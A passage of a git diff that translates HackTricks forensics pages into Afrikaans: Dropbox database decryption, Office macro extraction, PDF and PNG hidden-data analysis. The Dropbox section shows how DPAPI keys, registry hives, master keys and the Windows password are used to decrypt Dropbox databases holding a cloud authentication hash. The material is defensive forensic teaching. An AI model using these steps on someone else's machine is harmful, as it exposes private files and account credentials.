0D638C092E8B82FC452883F95F355B8E -* **Algorithm**: PBKDF2 -* **Iterations**: 1066 +* **Entropie**: d114a55212655f74bd772e37e64aee9b +* **Sout**: 0D638C092E8B82FC452883F95F355B8E +* **Algoritme**: PBKDF2 +* **Iterasies**: 1066 -Apart from that information, to decrypt the databases you still need: +Afgesien van daardie inligting, om die databasisse te ontsluit, het jy steeds nodig: -* The **encrypted DPAPI key**: You can find it in the registry inside `NTUSER.DAT\Software\Dropbox\ks\client` (export this data as binary) -* The **`SYSTEM`** and **`SECURITY`** hives -* The **DPAPI master keys**: Which can be found in `\Users\\AppData\Roaming\Microsoft\Protect` -* The **username** and **password** of the Windows user +* Die **gekripteerde DPAPI-sleutel**: Jy kan dit in die register vind binne `NTUSER.DAT\Software\Dropbox\ks\client` (voer hierdie data uit as binêr) +* Die **`SYSTEM`** en **`SECURITY`**-bytjies +* Die **DPAPI-hoofsleutels**: Wat gevind kan word in `\Users\\AppData\Roaming\Microsoft\Protect` +* Die **gebruikersnaam** en **wagwoord** van die Windows-gebruiker -Then you can use the tool [**DataProtectionDecryptor**](https://nirsoft.net/utils/dpapi\_data\_decryptor.html)**:** +Dan kan jy die instrument [**DataProtectionDecryptor**](https://nirsoft.net/utils/dpapi\_data\_decryptor.html)** gebruik:** ![](<../../../.gitbook/assets/image (448).png>) -If everything goes as expected, the tool will indicate the **primary key** that you need to **use to recover the original one**. To recover the original one, just use this [cyber\_chef receipt](https://gchq.github.io/CyberChef/#recipe=Derive\_PBKDF2\_key\(%7B'option':'Hex','string':'98FD6A76ECB87DE8DAB4623123402167'%7D,128,1066,'SHA1',%7B'option':'Hex','string':'0D638C092E8B82FC452883F95F355B8E'%7D\)) putting the primary key as the "passphrase" inside the receipt. - -The resulting hex is the final key used to encrypt the databases which can be decrypted with: +As alles soos verwag verloop, sal die instrument die **primêre sleutel** aandui wat jy moet **gebruik om die oorspronklike sleutel te herstel**. Om die oorspronklike sleutel te herstel, gebruik jy net hierdie [cyber\_chef-resep](https://gchq.github.io/CyberChef/#recipe=Derive\_PBKDF2\_key\(%7B'option':'Hex','string':'98FD6A76ECB87DE8DAB4623123402167'%7D,128,1066,'SHA1',%7B'option':'Hex','string':'0D638C092E8B82FC452883F95F355B8E'%7D\)) en plaas die primêre sleutel as die "wagwoord" binne die resep. +Die resulterende heks is die finale sleutel wat gebruik word om die databasisse te kripteer, wat ontsluit kan word met: ```bash sqlite -k config.dbx ".backup config.db" #This decompress the config.dbx and creates a clear text backup in config.db ``` +Die **`config.dbx`** databasis bevat: -The **`config.dbx`** database contains: +* **E-pos**: Die e-pos van die gebruiker +* **usernamedisplayname**: Die naam van die gebruiker +* **dropbox\_path**: Pad waar die Dropbox-lys geleë is +* **Host\_id: Hash** wat gebruik word om te verifieer by die wolk. Dit kan slegs vanaf die web herroep word. +* **Root\_ns**: Gebruikersidentifiseerder -* **Email**: The email of the user -* **usernamedisplayname**: The name of the user -* **dropbox\_path**: Path where the dropbox folder is located -* **Host\_id: Hash** used to authenticate to the cloud. This can only be revoked from the web. -* **Root\_ns**: User identifier +Die **`filecache.db`** databasis bevat inligting oor al die lêers en vouers wat met Dropbox gesinchroniseer is. Die tabel `File_journal` bevat die meeste nuttige inligting: -The **`filecache.db`** database contains information about all the files and folders synchronized with Dropbox. The table `File_journal` is the one with more useful information: +* **Server\_path**: Pad waar die lêer binne die bediener geleë is (hierdie pad word voorafgegaan deur die `host_id` van die kliënt). +* **local\_sjid**: Weergawe van die lêer +* **local\_mtime**: Wysigingsdatum +* **local\_ctime**: Skeppingsdatum -* **Server\_path**: Path where the file is located inside the server (this path is preceded by the `host_id` of the client). -* **local\_sjid**: Version of the file -* **local\_mtime**: Modification date -* **local\_ctime**: Creation date +Ander tabelle binne hierdie databasis bevat meer interessante inligting: -Other tables inside this database contain more interesting information: - -* **block\_cache**: hash of all the files and folders of Dropbox -* **block\_ref**: Related the hash ID of the table `block_cache` with the file ID in the table `file_journal` -* **mount\_table**: Share folders of dropbox -* **deleted\_fields**: Dropbox deleted files +* **block\_cache**: hash van al die lêers en vouers van Dropbox +* **block\_ref**: Verbind die hash-ID van die tabel `block_cache` met die lêer-ID in die tabel `file_journal` +* **mount\_table**: Deel vouers van Dropbox +* **deleted\_fields**: Dropbox verwyderde lêers * **date\_added**
\ -Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: +Gebruik [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) om maklik werkstrome te bou en outomatiseer met behulp van die wêreld se mees gevorderde gemeenskapsinstrumente.\ +Kry vandag toegang: {% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
diff --git a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/office-file-analysis.md b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/office-file-analysis.md index 4dced7582..4794c117e 100644 --- a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/office-file-analysis.md +++ b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/office-file-analysis.md @@ -1,63 +1,58 @@ -# Office file analysis +# Kantoorlêer-ontleding
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
\ -Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: +Gebruik [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) om maklik werkstrome te bou en outomatiseer met behulp van die wêreld se **mees gevorderde** gemeenskapsinstrumente.\ +Kry vandag toegang: {% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} -For further information check [https://trailofbits.github.io/ctf/forensics/](https://trailofbits.github.io/ctf/forensics/). This is just a sumary: +Vir verdere inligting, kyk na [https://trailofbits.github.io/ctf/forensics/](https://trailofbits.github.io/ctf/forensics/). Dit is net 'n opsomming: +Microsoft het baie kantoorlêer-formate geskep, met twee hooftipes, naamlik **OLE-formate** (soos RTF, DOC, XLS, PPT) en **Office Open XML (OOXML) formate** (soos DOCX, XLSX, PPTX). Hierdie formate kan makros insluit, wat hulle teikens maak vir hengel en kwaadwillige sagteware. OOXML-lêers is gestruktureer as zip-houers, wat inspeksie deur middel van uitpakkery moontlik maak, waar die lêer- en vouerhiërargie en XML-lêerinhoude onthul word. -Microsoft has created many office document formats, with two main types being **OLE formats** (like RTF, DOC, XLS, PPT) and **Office Open XML (OOXML) formats** (such as DOCX, XLSX, PPTX). These formats can include macros, making them targets for phishing and malware. OOXML files are structured as zip containers, allowing inspection through unzipping, revealing the file and folder hierarchy and XML file contents. +Om OOXML-lêerstrukture te verken, word die opdrag om 'n dokument uit te pak en die uitsetstruktuur gegee. Tegnieke vir die versteek van data in hierdie lêers is gedokumenteer, wat voortdurende innovasie in data-versteek binne CTF-uitdagings aandui. -To explore OOXML file structures, the command to unzip a document and the output structure are given. Techniques for hiding data in these files have been documented, indicating ongoing innovation in data concealment within CTF challenges. - -For analysis, **oletools** and **OfficeDissector** offer comprehensive toolsets for examining both OLE and OOXML documents. These tools help in identifying and analyzing embedded macros, which often serve as vectors for malware delivery, typically downloading and executing additional malicious payloads. Analysis of VBA macros can be conducted without Microsoft Office by utilizing Libre Office, which allows for debugging with breakpoints and watch variables. - -Installation and usage of **oletools** are straightforward, with commands provided for installing via pip and extracting macros from documents. Automatic execution of macros is triggered by functions like `AutoOpen`, `AutoExec`, or `Document_Open`. +Vir ontleding bied **oletools** en **OfficeDissector** omvattende gereedskapstelle vir die ondersoek van beide OLE- en OOXML-dokumente. Hierdie gereedskap help om ingebedde makros te identifiseer en te analiseer, wat dikwels as vektore vir kwaadwillige sagteware-aflewering dien, wat tipies aanvullende skadelike lading aflaai en uitvoer. Analise van VBA-makros kan uitgevoer word sonder Microsoft Office deur gebruik te maak van Libre Office, wat voorsiening maak vir foutopsporing met breekpunte en kykveranderlikes. +Die installasie en gebruik van **oletools** is eenvoudig, met opdragte wat voorsien word vir installasie via pip en die onttrekking van makros uit dokumente. Outomatiese uitvoering van makros word geaktiveer deur funksies soos `AutoOpen`, `AutoExec`, of `Document_Open`. ```bash sudo pip3 install -U oletools olevba -c /path/to/document #Extract macros ``` - -
-\ -Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: +Gebruik [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) om maklik en outomatiese werksvloeie te bou met behulp van die wêreld se mees gevorderde gemeenskapsinstrumente.\ +Kry vandag toegang: {% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy in HackTricks wil adverteer** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repositoriums.
diff --git a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/pdf-file-analysis.md b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/pdf-file-analysis.md index 4a0a11bae..e018c967f 100644 --- a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/pdf-file-analysis.md +++ b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/pdf-file-analysis.md @@ -1,52 +1,52 @@ -# PDF File analysis +# PDF-lêerontleding
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSKRIPSIEPLANNE**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFT's**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
\ -Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: +Gebruik [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) om maklik werkstrome te bou en outomatiseer met behulp van die wêreld se mees gevorderde gemeenskapsinstrumente.\ +Kry vandag toegang: {% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} -**For further details check: [https://trailofbits.github.io/ctf/forensics/](https://trailofbits.github.io/ctf/forensics/)** +**Vir verdere besonderhede, kyk na: [https://trailofbits.github.io/ctf/forensics/](https://trailofbits.github.io/ctf/forensics/)** -The PDF format is known for its complexity and potential for concealing data, making it a focal point for CTF forensics challenges. It combines plain-text elements with binary objects, which might be compressed or encrypted, and can include scripts in languages like JavaScript or Flash. To understand PDF structure, one can refer to Didier Stevens's [introductory material](https://blog.didierstevens.com/2008/04/09/quickpost-about-the-physical-and-logical-structure-of-pdf-files/), or use tools like a text editor or a PDF-specific editor such as Origami. +Die PDF-formaat is bekend vir sy kompleksiteit en potensiaal om data te verberg, wat dit 'n fokuspunt maak vir CTF-forensiese uitdagings. Dit kombineer plain-tekstelemente met binêre voorwerpe, wat moontlik saamgedruk of versleutel kan wees, en kan skripte in tale soos JavaScript of Flash insluit. Om die PDF-struktuur te verstaan, kan verwys word na Didier Stevens se [inleidende materiaal](https://blog.didierstevens.com/2008/04/09/quickpost-about-the-physical-and-logical-structure-of-pdf-files/), of gebruik maak van hulpmiddels soos 'n teksredigeerder of 'n PDF-spesifieke redigeerder soos Origami. -For in-depth exploration or manipulation of PDFs, tools like [qpdf](https://github.com/qpdf/qpdf) and [Origami](https://github.com/mobmewireless/origami-pdf) are available. Hidden data within PDFs might be concealed in: +Vir diepgaande verkenning of manipulasie van PDF's is hulpmiddels soos [qpdf](https://github.com/qpdf/qpdf) en [Origami](https://github.com/mobmewireless/origami-pdf) beskikbaar. Versteekte data binne PDF's kan verskuil wees in: -* Invisible layers -* XMP metadata format by Adobe -* Incremental generations -* Text with the same color as the background -* Text behind images or overlapping images -* Non-displayed comments +* Onsigbare lae +* XMP-metadata-formaat deur Adobe +* Inkrementele generasies +* Teks met dieselfde kleur as die agtergrond +* Teks agter beelde of oorvleuelende beelde +* Nie-vertoonde kommentaar -For custom PDF analysis, Python libraries like [PeepDF](https://github.com/jesparza/peepdf) can be used to craft bespoke parsing scripts. Further, the PDF's potential for hidden data storage is so vast that resources like the NSA guide on PDF risks and countermeasures, though no longer hosted at its original location, still offer valuable insights. A [copy of the guide](http://www.itsecure.hu/library/file/Biztons%C3%A1gi%20%C3%BAtmutat%C3%B3k/Alkalmaz%C3%A1sok/Hidden%20Data%20and%20Metadata%20in%20Adobe%20PDF%20Files.pdf) and a collection of [PDF format tricks](https://github.com/corkami/docs/blob/master/PDF/PDF.md) by Ange Albertini can provide further reading on the subject. +Vir aangepaste PDF-ontleding kan Python-biblioteke soos [PeepDF](https://github.com/jesparza/peepdf) gebruik word om spesiale ontledingsskripte te skep. Verder is die potensiaal van die PDF vir versteekte data-opberging so groot dat bronne soos die NSA-gids oor PDF-risiko's en teenmaatreëls, alhoewel dit nie meer by sy oorspronklike plek gehuisves word nie, steeds waardevolle insigte bied. 'n [Afskrif van die gids](http://www.itsecure.hu/library/file/Biztons%C3%A1gi%20%C3%BAtmutat%C3%B3k/Alkalmaz%C3%A1sok/Hidden%20Data%20and%20Metadata%20in%20Adobe%20PDF%20Files.pdf) en 'n versameling [PDF-formaat-truuks](https://github.com/corkami/docs/blob/master/PDF/PDF.md) deur Ange Albertini kan verdere leesstof oor die onderwerp bied.
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSKRIPSIEPLANNE**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFT's**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
diff --git a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/png-tricks.md b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/png-tricks.md index 46a9656c5..90f1255af 100644 --- a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/png-tricks.md +++ b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/png-tricks.md @@ -1,37 +1,33 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
-**PNG files** are highly regarded in **CTF challenges** for their **lossless compression**, making them ideal for embedding hidden data. Tools like **Wireshark** enable the analysis of PNG files by dissecting their data within network packets, revealing embedded information or anomalies. +**PNG-lêers** word hoog aangeskryf in **CTF-uitdagings** vir hul **verlieslose kompressie**, wat hulle ideaal maak vir die insluiting van verborge data. Hul data kan ontleed word deur hul netwerkpakketten met behulp van hul gereedskap soos **Wireshark**, wat ingebedde inligting of anomalieë kan onthul. -For checking PNG file integrity and repairing corruption, **pngcheck** is a crucial tool, offering command-line functionality to validate and diagnose PNG files ([pngcheck](http://libpng.org/pub/png/apps/pngcheck.html)). When files are beyond simple fixes, online services like [OfficeRecovery's PixRecovery](https://online.officerecovery.com/pixrecovery/) provide a web-based solution for **repairing corrupted PNGs**, aiding in the recovery of crucial data for CTF participants. +Vir die nagaan van die integriteit van PNG-lêers en die herstel van korrupte lêers, is **pngcheck** 'n noodsaaklike gereedskap wat opdraggelynfunksionaliteit bied om PNG-lêers te valideer en te diagnoseer ([pngcheck](http://libpng.org/pub/png/apps/pngcheck.html)). Wanneer lêers buite eenvoudige herstel is, bied aanlyn dienste soos [OfficeRecovery se PixRecovery](https://online.officerecovery.com/pixrecovery/) 'n webgebaseerde oplossing vir die herstel van korrupte PNG's, wat kan help om belangrike data vir CTF-deelnemers te herwin. -These strategies underscore the importance of a comprehensive approach in CTFs, utilizing a blend of analytical tools and repair techniques to uncover and recover hidden or lost data. +Hierdie strategieë beklemtoon die belang van 'n omvattende benadering in CTF's, waarin 'n kombinasie van analitiese gereedskap en hersteltegnieke gebruik word om verborge of verlore data te ontdek en te herwin.
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
- - diff --git a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/video-and-audio-file-analysis.md b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/video-and-audio-file-analysis.md index 135dd23f0..3b520d762 100644 --- a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/video-and-audio-file-analysis.md +++ b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/video-and-audio-file-analysis.md @@ -1,45 +1,41 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 